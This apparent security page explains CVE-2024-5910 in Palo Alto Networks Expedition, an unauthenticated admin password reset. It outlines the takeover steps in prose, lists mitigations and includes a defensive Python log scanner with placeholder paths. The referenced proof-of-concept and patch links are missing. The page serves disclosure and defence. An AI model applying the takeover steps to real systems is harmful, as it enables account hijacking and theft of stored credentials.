Exploiting Missing Authentication in Palo Alto Networks Expedition
CVE-2024-5910, 10 Nov 2024
CVE-2024-5910 is a critical vulnerability in the Palo Alto Networks Expedition tool, which is used for firewall configuration migration and management. This vulnerability arises from missing authentication for a critical function, allowing an attacker with network access to take over an Expedition admin account. Once exploited, attackers can gain access to sensitive configuration secrets, credentials, and other data stored within the tool.
Exploit Details
The vulnerability can be exploited by sending a specially crafted request to an exposed endpoint, which resets the admin password. Here’s a simplified example of how the exploit might work:
Identify the Vulnerable Endpoint: The attacker identifies an exposed endpoint in the Expedition tool that lacks proper authentication.
Craft the Exploit Request: The attacker crafts a request to reset the admin password. This can be done using a simple HTTP request.
Execute the Exploit: The attacker sends the crafted request to the vulnerable endpoint. If successful, the admin password is reset to a new value controlled by the attacker.
Gain Access: With the new admin password, the attacker can log in to the Expedition tool and access sensitive data, including configuration secrets and credentials.
Mitigation
To mitigate this vulnerability, it is essential to:
Update Expedition: Upgrade to Expedition version 1.2.92 or later, where the vulnerability has been fixed.
Restrict Network Access: Ensure that network access to the Expedition installation is restricted to authorized users, hosts, or networks.
Monitor for Indicators of Compromise: Regularly check for any signs of exploitation and take immediate action if any are found.
For more detailed guidance and updates, you can refer to the CISA advisory and other security advisories.
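One way to act on the access-restriction and monitoring steps above, as an added example that is not from the original page or from Palo Alto Networks: it scans web access log lines for requests to the password-reset function from outside the authorized management network and notes whether a successful login from the same source followed. The endpoint paths are labelled placeholders, and the combined log format, allowlist, time window and log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Assumptions, not from the page: both paths are placeholders (take the real
# ones from the vendor advisory); the allowlist and log lines are constructed.
RESET_PATH = "/PLACEHOLDER/admin-reset"
LOGIN_PATH = "/PLACEHOLDER/login"
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/24")]
WINDOW = timedelta(minutes=30)
LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')

SAMPLE_LOG = """\
10.20.0.15 - - [10/Nov/2024:09:00:01 +0000] "POST /PLACEHOLDER/login HTTP/1.1" 200 512
203.0.113.7 - - [10/Nov/2024:09:12:40 +0000] "POST /PLACEHOLDER/admin-reset HTTP/1.1" 200 64
203.0.113.7 - - [10/Nov/2024:09:13:05 +0000] "POST /PLACEHOLDER/login?x=1 HTTP/1.1" 200 2048
198.51.100.9 - - [10/Nov/2024:10:00:00 +0000] "GET /PLACEHOLDER/admin-reset HTTP/1.1" 404 0
truncated or malformed line
"""

def is_allowed(ip):
    """True only if ip parses and sits inside an authorized management network."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_NETS)

def find_suspicious(log_text):
    """Flag reset-endpoint hits from outside the allowlist, noting any login that followed."""
    findings, last_reset = [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, raw_ts, target, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        ts = datetime.strptime(raw_ts, "%d/%b/%Y:%H:%M:%S %z")
        path = target.split("?", 1)[0]  # ignore any query string
        if path == RESET_PATH and not is_allowed(ip):
            hit = {"ip": ip, "time": ts, "status": status, "login_followed": False}
            findings.append(hit)
            if status < 400:  # only a reset the server accepted can precede a takeover
                last_reset[ip] = hit
        elif path == LOGIN_PATH and status < 400 and ip in last_reset:
            if ts - last_reset[ip]["time"] <= WINDOW:
                last_reset[ip]["login_followed"] = True
    return findings

if __name__ == "__main__":
    print(*find_suspicious(SAMPLE_LOG), sep="\n")
```

A finding with login_followed set to True should be handled as a likely account takeover; a rejected request from an outside address still shows the installation is reachable from networks that should not have access.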
You can find the proof-of-concept (PoC) exploit for CVE-2024-5910 on GitHub. Here is the link to the repository:
Warning: All information on this page is provided solely for understanding the CVE-2024-5910 vulnerability and applying the patch as soon as possible. Unauthorized use of this information for any other purpose is strictly prohibited. Failure to apply the patch immediately may result in severe security risks, including unauthorized access and data theft.
For applying the patch for CVE-2024-5910, you can refer to the following link: